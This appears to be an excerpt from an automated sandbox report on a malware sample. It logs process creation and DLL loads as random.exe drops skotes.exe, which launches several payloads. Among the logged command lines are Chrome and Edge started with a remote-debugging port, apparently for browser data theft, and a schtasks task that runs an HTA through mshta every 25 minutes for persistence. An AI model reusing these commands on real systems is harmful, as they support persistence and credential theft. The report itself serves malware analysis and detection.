Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7864 -s 892
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe"
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process created: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe"
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 956
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2060,i,4473131301431397879,15771113308977078991,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2192,i,15452083786355478783,5027227299153518887,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe "C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe"
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn MbBLmmautKb /tr "mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe "C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe "C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe "C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe "C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 8012 -ip 8012	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process created: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process created: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2956 --field-trial-handle=2864,i,16846066234531792387,18071606711430051804,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process created: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe "C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe"
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process created: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2192,i,15452083786355478783,5027227299153518887,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process created: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2060,i,4473131301431397879,15771113308977078991,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn MbBLmmautKb /tr "mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\mshta.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\random.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ucrtbase_clr0400.dll
